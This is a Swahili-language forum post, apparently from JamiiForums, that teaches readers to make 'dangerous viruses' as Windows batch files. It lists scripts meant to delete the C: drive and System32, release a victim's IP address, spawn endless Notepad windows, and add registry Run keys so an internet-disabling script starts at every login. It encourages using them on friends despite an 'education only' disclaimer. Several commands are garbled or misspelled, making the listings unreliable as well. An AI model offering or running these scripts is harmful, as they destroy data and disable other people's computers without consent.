Jinsi ya kutengeneza virusi hatarishi

Jinsi ya kutengeneza virusi hatarishi

Teknolojia ni Yetu sote

JF-Expert Member
Joined
Apr 28, 2020
Posts
1,221
Reaction score
2,425
Jinsi ya kutengeneza virusi hatarishi

Tunaishi kwenye ulimwengu wa Teknolojia ambapo wengi wetu tunatumia simu au kompyuta kufanya mambo mbalimbali ulimwenguni. Najua umeshawahi kusikia kuhusu Virusi !!!

Virusi ni program hatarishi ambazo huweza kuleta madhara kwa watu kwani huweza kuingia kwenye mfumo wa mtu bila idhini ivyo huweza kuathili data pamoja na Os(operating system).

Duniani Kuna zaidi ya bilioni 1 ya virusi Kama vile trojan horses , malware, rootkit , Rats , worms na wengine wengi.

Makala yetu ya Leo nitawajuza jinsi ya kutengeneza virusi hatari ambao ni wa uwalisia kwa kutumia kompyuta au simu kupitia Notepad wasio na madhara makubwa Sana.

Ivyo tunatengeneza virusi ambao tutaweza kuhalibu kompyuta ya mtu yeyote Hata ya kwako mwenyewe japo sio rahisi Kama unavyofikiria Ila let's try .!!

Watu wengi wanajua kutengeneza virusi mpaka hujue sijui Kodi sio kweli kabisa ziko mbinu nyingi na hizi ni njia moja wapo za kutengeneza virusi.

1) virus atakaye futa System32 pamoja na Os file.
Ikiwa unataka kutengeneza virusi ambaye atasababisha kuhalibu Os pamoja na System32. Fungua Notepad Kisha andika hivi

echo OFF

DEL C: . |Y

Kisha save as virus.bat Ila unaweza kuipa jina lolote malizia na .bat ukifungua tu ilo file basi Driver C:\ itafutika completely pamoja na window Yako.

Kumbuka ni kwa ajili ya Elimu tu ila Kama utatumia kwenye kompyuta Yako jua utafuta vitu vyako vya local disks C ivyo ni elimu tu

2) tengeneza virusi ambaye atazuia intaneti kupatikana
Huyu ni virusi ambaye hawezi kuhalibu kompyuta Yako Bali atazuia upatikanaji wa intaneti kwenye kompyuta Yako ikiwa unataka kumtania rafiki Yako.

Fungua Notepad kwenye kompyuta Kisha andika hivi
echo OFF

IPCONGIF /RELEASE

Save file lako jina lolote malizia na neno bat. Yani bongo.bat apa utaweza kuifunga Ip address ya rafiki Yako ukitaka kurudisha Kawaida fungua cmd andika ipconfig/renew

Endless pop up virus
Ukimtengeneza huyu virus utakutana ujumbe unaojitokeza mara nyingi nyingi kwenye kompyuta na kusabaisha kuganda Ganda kompyuta.

echo OFF
:TOP
START %SYSTEMROOT%\SYSTEM32\NOTEPAD.EXE
GOTO TOP

Virus wa kuifunga intaneti pamoja na wireless connection
Utaweza kumzuia mtu yeyote asitumie intaneti kupitia izo kodi

ECHO echo OFF>C:WINDOWSWIMN32.BAT
ECHO BREAK OFF>C:WINDOWSWIMN32.BAT ECHO
IPCONFIG/RELEASE_ALL>C:WINDOWSWIMN32.BAT
ECHO END>C:WINDOWSWIMN32.BATREG ADD
HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN /V WINDOWSAPI /T REG_SZ /D C:WINDOWSWIMN32.BAT /FREG ADD
HKEY_CURRENT_USERSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN /V CONTROLEXIT /T REG_SZ /D C:WINDOWSWIMN32.BAT /FECHO YOU HAVE BEEN HACKED!
PAUSE

Virusi wako wengi Ila kumbuka tu virus niliowaeleza ni wa ukweli ivyo unaweza kuhalibu kompyuta Yako ukitumia vibaya Ila ni kwa Elimu tu kujifunza !!!

Teknolojia ni Yetu sote.
1_20220521_101357_0000.jpg
 
Back
Top Bottom